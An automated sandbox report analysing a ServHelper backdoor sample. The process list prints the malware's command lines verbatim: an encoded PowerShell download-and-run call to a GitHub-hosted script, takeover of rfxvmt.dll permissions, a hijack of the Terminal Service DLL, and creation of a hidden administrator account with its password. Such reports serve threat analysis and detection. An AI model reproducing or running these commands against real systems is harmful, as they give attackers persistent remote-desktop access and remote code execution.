Analysis
- max time kernel: 137s
- max time network: 180s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 22-09-2021 07:10
Static task: static1
Behavioral task: behavioral1
Sample: 61d5e32562d1c70daf0a3112f7888258.exe
Resource: win7v20210408
Behavioral task: behavioral2
Sample: 61d5e32562d1c70daf0a3112f7888258.exe
Resource: win10v20210408
General
- Target: 61d5e32562d1c70daf0a3112f7888258.exe
- Size: 5.7MB
- MD5: 61d5e32562d1c70daf0a3112f7888258
- SHA1: 11c54ce99e87637f58c7bc0bd8134c73df9bf879
- SHA256: da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605
- SHA512: 9cad97c4c71535a2391ad73d13e27748300e3147a3383d4eee85caadb461815f9ee8e9b172e732df16813fa8f5ffdc7115e2740778ebc51c536ab06fc7910cc2
Malware Config
Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
flow pid process
10 1628 powershell.exe
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
pid process
1888 icacls.exe
1840 icacls.exe
688 takeown.exe
1396 icacls.exe
1772 icacls.exe
1964 icacls.exe
1056 icacls.exe
1672 icacls.exe
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule
\Windows\Branding\mediasrv.png upx
\Windows\Branding\mediasvc.png upx
-
Loads dropped DLL 2 IoCs
Processes:
pid process
1852
1852
-
Modifies file permissions 1 TTPs 8 IoCs
Processes:
pid process
1888 icacls.exe
1840 icacls.exe
688 takeown.exe
1396 icacls.exe
1772 icacls.exe
1964 icacls.exe
1056 icacls.exe
1672 icacls.exe
-
Drops file in System32 directory 1 IoCs
Processes:
description ioc process
File created C:\Windows\system32\rfxvmt.dll powershell.exe
-
Drops file in Windows directory 21 IoCs
Processes:
description ioc process
File created C:\Windows\branding\wupsvc.jpg powershell.exe
File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce72d115-2a14-4d96-82c1-423615b22f64 powershell.exe
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c2b2a3a3-6d66-4fff-b722-1374efd0e345 powershell.exe
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b1c2efd2-c4a6-4a3d-871a-ad88f9e19c99 powershell.exe
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e484b633-43f2-4341-9cf8-8d0482f56207 powershell.exe
File created C:\Windows\branding\mediasrv.png powershell.exe
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\697JC32QH7VC53QJMTQA.temp powershell.exe
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b37b9c97-90dd-462d-863b-fa4071a4b59e powershell.exe
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6f584eb7-a5c9-47e6-94fe-eab0302050e6 powershell.exe
File opened for modification C:\Windows\branding\Basebrd powershell.exe
File opened for modification C:\Windows\branding\mediasrv.png powershell.exe
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_962932c3-718a-4659-bd9f-f8a703b735bc powershell.exe
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_92e09941-4f06-487c-b110-16566a51d47d powershell.exe
File created C:\Windows\branding\mediasvc.png powershell.exe
File opened for modification C:\Windows\branding\ShellBrd powershell.exe
File opened for modification C:\Windows\branding\mediasvc.png powershell.exe
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3d23646-1a6f-480b-8620-8400d86db01a powershell.exe
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_11b1ba59-eb8c-4543-9b2d-07cd4cb78241 powershell.exe
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_74dcc402-ab53-44ba-a397-6abd4975fcf8 powershell.exe
-
Modifies data under HKEY_USERS 4 IoCs
Processes:
description ioc process
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 40233aed91afd701 powershell.exe
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
pid process
1316 powershell.exe
1316 powershell.exe
1480 powershell.exe
1480 powershell.exe
1096 powershell.exe
1096 powershell.exe
1836 powershell.exe
1836 powershell.exe
1316 powershell.exe
1316 powershell.exe
1316 powershell.exe
1628 powershell.exe
1628 powershell.exe
-
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process
472
1852
1852
1852
1852
-
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
description pid process
Token: SeDebugPrivilege 1316 powershell.exe
Token: SeDebugPrivilege 1480 powershell.exe
Token: SeDebugPrivilege 1096 powershell.exe
Token: SeDebugPrivilege 1836 powershell.exe
Token: SeRestorePrivilege 1772 icacls.exe
Token: SeAssignPrimaryTokenPrivilege 1396 WMIC.exe
Token: SeIncreaseQuotaPrivilege 1396 WMIC.exe
Token: SeAuditPrivilege 1396 WMIC.exe
Token: SeAssignPrimaryTokenPrivilege 1396 WMIC.exe
Token: SeIncreaseQuotaPrivilege 1396 WMIC.exe
Token: SeAuditPrivilege 1396 WMIC.exe
Token: SeAssignPrimaryTokenPrivilege 1824 WMIC.exe
Token: SeIncreaseQuotaPrivilege 1824 WMIC.exe
Token: SeAuditPrivilege 1824 WMIC.exe
Token: SeAssignPrimaryTokenPrivilege 1824 WMIC.exe
Token: SeIncreaseQuotaPrivilege 1824 WMIC.exe
Token: SeAuditPrivilege 1824 WMIC.exe
Token: SeDebugPrivilege 1628 powershell.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description pid process target process
PID 1984 wrote to memory of 1316 1984 61d5e32562d1c70daf0a3112f7888258.exe powershell.exe
PID 1984 wrote to memory of 1316 1984 61d5e32562d1c70daf0a3112f7888258.exe powershell.exe
PID 1984 wrote to memory of 1316 1984 61d5e32562d1c70daf0a3112f7888258.exe powershell.exe
PID 1316 wrote to memory of 656 1316 powershell.exe csc.exe
PID 1316 wrote to memory of 656 1316 powershell.exe csc.exe
PID 1316 wrote to memory of 656 1316 powershell.exe csc.exe
PID 656 wrote to memory of 796 656 csc.exe cvtres.exe
PID 656 wrote to memory of 796 656 csc.exe cvtres.exe
PID 656 wrote to memory of 796 656 csc.exe cvtres.exe
PID 1316 wrote to memory of 1480 1316 powershell.exe powershell.exe
PID 1316 wrote to memory of 1480 1316 powershell.exe powershell.exe
PID 1316 wrote to memory of 1480 1316 powershell.exe powershell.exe
PID 1316 wrote to memory of 1096 1316 powershell.exe powershell.exe
PID 1316 wrote to memory of 1096 1316 powershell.exe powershell.exe
PID 1316 wrote to memory of 1096 1316 powershell.exe powershell.exe
PID 1316 wrote to memory of 1836 1316 powershell.exe powershell.exe
PID 1316 wrote to memory of 1836 1316 powershell.exe powershell.exe
PID 1316 wrote to memory of 1836 1316 powershell.exe powershell.exe
PID 1316 wrote to memory of 688 1316 powershell.exe takeown.exe
PID 1316 wrote to memory of 688 1316 powershell.exe takeown.exe
PID 1316 wrote to memory of 688 1316 powershell.exe takeown.exe
PID 1316 wrote to memory of 1396 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1396 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1396 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1772 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1772 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1772 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1964 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1964 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1964 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1056 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1056 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1056 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1672 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1672 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1672 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1888 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1888 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1888 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1840 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1840 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1840 1316 powershell.exe icacls.exe
PID 1316 wrote to memory of 1108 1316 powershell.exe reg.exe
PID 1316 wrote to memory of 1108 1316 powershell.exe reg.exe
PID 1316 wrote to memory of 1108 1316 powershell.exe reg.exe
PID 1316 wrote to memory of 1600 1316 powershell.exe reg.exe
PID 1316 wrote to memory of 1600 1316 powershell.exe reg.exe
PID 1316 wrote to memory of 1600 1316 powershell.exe reg.exe
PID 1316 wrote to memory of 336 1316 powershell.exe reg.exe
PID 1316 wrote to memory of 336 1316 powershell.exe reg.exe
PID 1316 wrote to memory of 336 1316 powershell.exe reg.exe
PID 1316 wrote to memory of 1492 1316 powershell.exe net.exe
PID 1316 wrote to memory of 1492 1316 powershell.exe net.exe
PID 1316 wrote to memory of 1492 1316 powershell.exe net.exe
PID 1492 wrote to memory of 784 1492 net.exe net1.exe
PID 1492 wrote to memory of 784 1492 net.exe net1.exe
PID 1492 wrote to memory of 784 1492 net.exe net1.exe
PID 1316 wrote to memory of 1708 1316 powershell.exe cmd.exe
PID 1316 wrote to memory of 1708 1316 powershell.exe cmd.exe
PID 1316 wrote to memory of 1708 1316 powershell.exe cmd.exe
PID 1708 wrote to memory of 1092 1708 cmd.exe cmd.exe
PID 1708 wrote to memory of 1092 1708 cmd.exe cmd.exe
PID 1708 wrote to memory of 1092 1708 cmd.exe cmd.exe
PID 1092 wrote to memory of 1552 1092 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"
Depth: 1
- Suspicious use of WriteProcessMemory
PID: 1984
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
Depth: 2
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 1316
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\05jmqopu\05jmqopu.cmdline"
Depth: 3
- Suspicious use of WriteProcessMemory
PID: 656
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES32A3.tmp" "c:\Users\Admin\AppData\Local\Temp\05jmqopu\CSCA0D889081A1743489B4E2093EAD758D3.TMP"
Depth: 4
PID: 796
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
Depth: 3
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 1480
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
Depth: 3
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 1096
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
Depth: 3
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 1836
-
C:\Windows\system32\takeown.exe
Command line: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
Depth: 3
- Possible privilege escalation attempt
- Modifies file permissions
PID: 688
-
C:\Windows\system32\icacls.exe
Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
Depth: 3
- Possible privilege escalation attempt
- Modifies file permissions
PID: 1396
-
C:\Windows\system32\icacls.exe
Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
Depth: 3
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID: 1772
-
C:\Windows\system32\icacls.exe
Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
Depth: 3
- Possible privilege escalation attempt
- Modifies file permissions
PID: 1964
-
C:\Windows\system32\icacls.exe
Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
Depth: 3
- Possible privilege escalation attempt
- Modifies file permissions
PID: 1056
-
C:\Windows\system32\icacls.exe
Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
Depth: 3
- Possible privilege escalation attempt
- Modifies file permissions
PID: 1672
-
C:\Windows\system32\icacls.exe
Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
Depth: 3
- Possible privilege escalation attempt
- Modifies file permissions
PID: 1888
-
C:\Windows\system32\icacls.exe
Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
Depth: 3
- Possible privilege escalation attempt
- Modifies file permissions
PID: 1840
-
C:\Windows\system32\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
Depth: 3
PID: 1108
-
C:\Windows\system32\reg.exe
Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
Depth: 3
- Modifies registry key
PID: 1600
-
C:\Windows\system32\reg.exe
Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
Depth: 3
PID: 336
-
C:\Windows\system32\net.exe
Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
Depth: 3
- Suspicious use of WriteProcessMemory
PID: 1492
-
C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
Depth: 4
PID: 784
-
C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
Depth: 3
- Suspicious use of WriteProcessMemory
PID: 1708
-
C:\Windows\system32\cmd.exe
Command line: cmd /c net start rdpdr
Depth: 4
- Suspicious use of WriteProcessMemory
PID: 1092
-
C:\Windows\system32\net.exe
Command line: net start rdpdr
Depth: 5
PID: 1552
-
C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 start rdpdr
Depth: 6
PID: 1608
-
C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
Depth: 3
PID: 1132
-
C:\Windows\system32\cmd.exe
Command line: cmd /c net start TermService
Depth: 4
PID: 296
-
C:\Windows\system32\net.exe
Command line: net start TermService
Depth: 5
PID: 1692
-
C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 start TermService
Depth: 6
PID: 2012
-
C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
Depth: 3
PID: 792
-
C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Depth: 3
PID: 688
-
C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
Depth: 1
PID: 1096
-
C:\Windows\system32\net.exe
Command line: net.exe user WgaUtilAcc 000000 /del
Depth: 2
PID: 1652
-
C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
Depth: 3
PID: 688
-
C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe user WgaUtilAcc M6LqWVFh /add
Depth: 1
PID: 1396
-
C:\Windows\system32\net.exe
Command line: net.exe user WgaUtilAcc M6LqWVFh /add
Depth: 2
PID: 1620
-
C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 user WgaUtilAcc M6LqWVFh /add
Depth: 3
PID: 1504
-
C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
Depth: 1
PID: 624
-
C:\Windows\system32\net.exe
Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
Depth: 2
PID: 1508
-
C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
Depth: 3
PID: 1636
-
C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
Depth: 1
PID: 524
-
C:\Windows\system32\net.exe
Command line: net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
Depth: 2
PID: 1732
-
C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
Depth: 3
PID: 1492
-
C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
Depth: 1
PID: 1388
-
C:\Windows\system32\net.exe
Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
Depth: 2
PID: 1224
-
C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
Depth: 3
PID: 1796
-
C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe user WgaUtilAcc M6LqWVFh
Depth: 1
PID: 1256
-
C:\Windows\system32\net.exe
Command line: net.exe user WgaUtilAcc M6LqWVFh
Depth: 2
PID: 1336
-
C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 user WgaUtilAcc M6LqWVFh
Depth: 1
PID: 1096
-
C:\Windows\System32\cmd.exe
Command line: cmd.exe /C wmic path win32_VideoController get name
Depth: 1
PID: 1564
-
C:\Windows\System32\Wbem\WMIC.exe
Command line: wmic path win32_VideoController get name
Depth: 2
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID: 1396
-
C:\Windows\System32\cmd.exe
Command line: cmd.exe /C wmic CPU get NAME
Depth: 1
PID: 1636
-
C:\Windows\System32\Wbem\WMIC.exe
Command line: wmic CPU get NAME
Depth: 2
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID: 1824
-
C:\Windows\System32\cmd.exe
Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
Depth: 1
PID: 1492
-
C:\Windows\system32\cmd.exe
Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
Depth: 2
PID: 1688
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
Depth: 3
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 1628
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0ce18943-ab59-4066-aeb2-b10edb6f9f77
MD5 a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA1 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256 dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA512 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_573a45bd-b12f-4a5e-add0-1d1aa6cfa04f
MD5 6f0d509e28be1af95ba237d4f43adab4
SHA1 c665febe79e435843553bee86a6cea731ce6c5e4
SHA256 f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA512 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d9bbdec-8ab1-4855-a491-8531e8811405
MD5 faa37917b36371249ac9fcf93317bf97
SHA1 a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256 b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b1d32d61-47b4-4686-9342-cd1aa78d28ec
MD5 d89968acfbd0cd60b51df04860d99896
SHA1 b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA256 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512 b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cb33da80-6225-49e3-b468-e4a22a8388dc
MD5 e5b3ba61c3cf07deda462c9b27eb4166
SHA1 b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256 b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512 a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dcd079b1-de23-4531-b9b5-a9cac42e778d
MD5 7f79b990cb5ed648f9e583fe35527aa7
SHA1 71b177b48c8bd745ef02c2affad79ca222da7c33
SHA256 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA512 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fb9f171a-bad4-450d-b222-3cfd78e062f0
MD5 2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1 ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256 ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512 edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5 4ea69dafda7ebbc1ca647f6d1cf00955
SHA1 ed2d10c7d446830c95086ddde2b6f03f55daff95
SHA256 2b5720866d2cde6aff7e0da55e813ba71b96f366a4776889374c4f6df0ae0f59
SHA512 6b2fef4550214cc84c0b82eee46c472b2df22ac097623c906b449403bdd16973bdea061280bbb514c228cefe8f35a0bb2a19c27ff8a9a04e77fe492430a075ed
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5 e0c191ab1b3ba28db8b6c5e67f852c26
SHA1 d3b7af7db2a2692eb0427120bb2e467ce49c711f
SHA256 d667be52d1b013feddfe7d207a7880639441e7c0c6721f1e33aadec4a6c5f635
SHA512 74ead2b11d85b638d2a090543c65148cd828a41f367ce607dcb0625fc9bc6262ed7010d794508aedb9738dcfa747df57546a3ab076027e3a64afcd5bec2a1e9a
-
MD5 fb7c7035e271ed0d72fb1fbf83c0f6ec
SHA1 1b981c98082df7377b84f07ec6ce5ed539872f80
SHA256 b9dba969c28f809803b759e5406f87274083adf6d66bfbc98d2379b09e0905cb
SHA512 307c5d3b00af58fd4262f154637fbd173cc4a1859c16afaad39f3cb67ed4f9efabc2ecb8c10659d5f57bdfa37d2e8c7d6dd2063cb7e16b0426a42bc95afcaa42
-
MD5 391041e3fb747dc2efdedcd0af2370ad
SHA1 12c880e66405c7d4f637b01aed9180839605d375
SHA256 41d11488f50ee0c171d5a258a01e041ada8c693805c0d5eafffd914db85cc47d
SHA512 77e9d87d2a6a8e9385725785226f6b697a82e3b49838a2121141e8f6ceb3739db9e0bda15d222eb3a33596c044ee4958204680ff3eee25a38bf1b4ed3e965ac6
-
MD5 9fca6b1768eba2c5d42f189123152e32
SHA1 560ec3249af6e8d82e994554475b870d32145352
SHA256 c5c7012656bfebd5ba7d4ae8459bd2fcc57ac661e413e2b1da339b9fba86de1f
